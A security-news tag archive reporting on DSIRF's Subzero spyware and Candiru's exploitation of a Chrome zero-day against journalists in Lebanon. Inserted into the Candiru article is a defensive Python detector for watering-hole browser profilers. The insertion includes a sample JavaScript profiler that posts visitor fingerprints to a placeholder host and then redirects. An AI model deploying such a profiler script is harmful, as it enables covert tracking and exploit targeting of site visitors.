Tag Archive for: Spyware

Microsoft says Austrian firm behind spyware targeting law firms, banks

LONDON, July 27 (Reuters) – Security researchers at Microsoft (MSFT.O) have said an Austrian firm was behind a string of digital intrusions at banks, law firms and strategic consultancies in at least three countries.

The firm, DSIRF, developed spyware – malicious software designed to spy on or steal information from a target’s device – called “Subzero”, which uses so-called zero-day exploits to access confidential information such as passwords or logon credentials, Microsoft said in a blog post on Wednesday.

“Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama,” the post said, without identifying the victims.


Vienna-based DSIRF, or DSR Decision Supporting Information Research Forensic GmbH, did not respond to email and telephone requests for comment.

Zero-day exploits are serious software flaws of great value to both hackers and spies because they work even when software is up to date.

The term comes from the amount of warning users get to patch their machines protectively; a two-day flaw is less dangerous because it emerges two days after a patch is available.

Some cybersecurity firms develop such tools to deploy alongside routine “pentesting”, or penetration testing, to test a company’s digital defences against malicious attacks.

“Microsoft’s interaction with a victim confirmed they had not consented to red teaming and malware deployment, and confirmed it was unauthorised activity,” Microsoft Security Unit general manager Cristin Goodwin, who authored the report, told Reuters.

According to a copy of an internal presentation published last year by German news website Netzpolitik, DSIRF advertises Subzero as a “next generation cyber warfare” tool which can take full control of a target’s PC, steal passwords, and reveal its location.

Another one of the slides in that presentation showed several uses for the spyware, including anti-terrorism and the targeting of human trafficking and child pornography rings.

Microsoft’s findings come as the United States and Europe mull tighter rules around vendors of spyware, a fast-growing and under-regulated…


Candiru Spyware Caught Exploiting Google Chrome Zero-Day to Target Journalists


The actively exploited but now-fixed Google Chrome zero-day flaw that came to light earlier this month was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.

Czech cybersecurity firm Avast linked the exploitation to Candiru (aka Saito Tech), which has a history of leveraging previously unknown flaws to deploy a Windows malware dubbed DevilsTongue, a modular implant with Pegasus-like capabilities.

Candiru, along with NSO Group, Computer Security Initiative Consultancy PTE. LTD., and Positive Technologies, were added to the entity list by the U.S. Commerce Department in November 2021 for engaging in “malicious cyber activities.”

“Specifically, a large portion of the attacks took place in Lebanon, where journalists were among the targeted parties,” security researcher Jan Vojtěšek, who reported the discovery of the flaw, said in a report. “We believe the attacks were highly targeted.”


The vulnerability in question is CVE-2022-2294, a memory corruption bug in the WebRTC component of the Google Chrome browser that could lead to shellcode execution. It was addressed by Google on July 4, 2022. The same issue has since been patched by Apple and Microsoft in the Safari and Edge browsers.

The findings shed light on multiple attack campaigns mounted by the Israeli hack-for-hire vendor, which is said to have returned with a revamped toolset in March 2022 to target users in Lebanon, Turkey, Yemen, and Palestine via watering hole attacks using zero-day exploits for Google Chrome.


The infection sequence spotted in Lebanon commenced with the attackers compromising a website used by employees of a news agency and injecting malicious JavaScript code loaded from an actor-controlled domain; that code was responsible for redirecting potential victims to an exploit server.

Via this watering hole technique, a profile of the victim’s browser consisting of about 50 data points is created, covering details such as language, timezone, screen information, device type, browser plugins, referrer, and device memory.
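The profiling stage described above is what a defender is most likely to find first when triaging an injected script on a compromised site, since the exploit itself is only served to browsers that match the profile. The following is an added example, not code from the report or from Avast: a small static triage heuristic that scans JavaScript source for accesses to the attribute classes the report names (language, timezone, screen, device type, plugins, referrer, device memory) together with a network or redirection sink, and flags scripts that combine many profile categories with such a sink. The regex groupings, the threshold, and the two sample scripts are this example's own constructions.

```python
import re

# Browser APIs that expose the profile attributes named in the report, grouped by
# category. These groupings are this example's own heuristics (an assumption), not
# Avast's detection logic; extend them for your own environment.
PROFILE_SIGNALS = {
    "language": [r"navigator\.languages?\b"],
    "timezone": [r"getTimezoneOffset\s*\(", r"resolvedOptions\s*\(\)\.timeZone"],
    "screen": [r"\bscreen\.(width|height|colorDepth|pixelDepth|availWidth|availHeight)\b",
               r"devicePixelRatio"],
    "device_type": [r"navigator\.(platform|userAgent|userAgentData|maxTouchPoints)\b"],
    "plugins": [r"navigator\.(plugins|mimeTypes)\b"],
    "referrer": [r"document\.referrer\b"],
    "device_memory": [r"navigator\.(deviceMemory|hardwareConcurrency)\b"],
}

# Ways a script can ship the profile off-page or move the visitor to another server.
EXFIL_SINKS = [
    r"\bfetch\s*\(",
    r"XMLHttpRequest",
    r"navigator\.sendBeacon\s*\(",
    r"window\.location(\.href)?\s*=",
    r"location\.(assign|replace)\s*\(",
]


def profile_script(js_source):
    """Return ({category: hit_count}, sink_call_count) for one JavaScript source."""
    hits = {}
    for category, patterns in PROFILE_SIGNALS.items():
        n = sum(len(re.findall(p, js_source)) for p in patterns)
        if n:
            hits[category] = n
    sinks = sum(len(re.findall(p, js_source)) for p in EXFIL_SINKS)
    return hits, sinks


def classify(js_source, min_categories=4):
    """Flag a script when it touches many profile categories AND has an exfil/redirect sink.

    Ordinary analytics reads one or two attributes; a watering-hole profiler reads
    many and sends them somewhere before deciding whether to redirect. The threshold
    of four categories is a tunable assumption, not a figure from the report.
    """
    hits, sinks = profile_script(js_source)
    suspicious = len(hits) >= min_categories and sinks > 0
    return {"categories": sorted(hits), "sink_calls": sinks, "suspicious": suspicious}


# Constructed sample: a page-view beacon that reads two attributes (benign).
BENIGN_ANALYTICS = """
var data = {lang: navigator.language, ref: document.referrer};
navigator.sendBeacon('/collect', JSON.stringify(data));
"""

# Constructed sample: a profiler that reads every category named in the report,
# posts the result, then redirects. The host name is a placeholder.
PROFILER = """
var p = {};
p.lang = navigator.language; p.langs = navigator.languages;
p.tz = new Date().getTimezoneOffset();
p.tzName = Intl.DateTimeFormat().resolvedOptions().timeZone;
p.sw = screen.width; p.sh = screen.height; p.cd = screen.colorDepth;
p.dpr = window.devicePixelRatio;
p.plat = navigator.platform; p.ua = navigator.userAgent; p.touch = navigator.maxTouchPoints;
p.plugins = navigator.plugins.length;
p.ref = document.referrer;
p.mem = navigator.deviceMemory; p.cores = navigator.hardwareConcurrency;
fetch('https://profiler.example/p', {method: 'POST', body: JSON.stringify(p)})
  .then(function () { window.location.href = 'https://profiler.example/stage2'; });
"""

if __name__ == "__main__":
    for name, src in (("analytics", BENIGN_ANALYTICS), ("profiler", PROFILER)):
        print(name, classify(src))
```

Run it over every inline and external script pulled from a suspect page; a hit list spanning most categories plus a sink to a domain the site does not normally talk to is the pattern worth escalating, while the same categories with no sink (for example a responsive-layout helper reading `screen.width`) is usually noise.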

Avast assessed the information gathered to ensure that the exploit was being delivered only to the intended targets. Should the collected data be deemed of…